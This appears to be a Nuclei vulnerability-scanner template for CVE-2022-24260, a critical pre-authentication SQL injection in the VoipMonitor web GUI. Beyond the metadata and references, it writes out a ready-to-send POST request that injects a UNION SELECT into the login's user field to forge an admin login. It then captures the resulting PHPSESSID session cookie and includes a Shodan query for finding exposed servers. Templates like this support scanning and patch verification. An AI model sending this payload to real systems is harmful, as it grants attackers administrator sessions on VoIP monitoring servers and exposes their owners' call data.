id: CVE-2022-24260 info: name: VoipMonitor - Pre-Auth SQL Injection author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application. reference: - https://kerbit.io/research/read/blog/3 - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 - https://www.voipmonitor.org/changelog-gui?major=5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 epss-score: 0.42516 epss-percentile: 0.96922 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth http: - raw: - | POST /api.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; # matchers-condition: and matchers: - type: word words: - '"success":true' - '_vm_version' - '_debug' condition: and - type: status status: - 200 extractors: - type: kval kval: - PHPSESSID # digest: 4b0a00483046022100b170589e5098b9f2ef8a97cf2ef47e1467d93fb3ca5a06e86a5329568ce07cae022100cb0e5a9c1b8782c645877239de6d1a1bc7656f6aefe18af7b5a82bbb007c5236:922c64590222798bb761d5b6d8e72950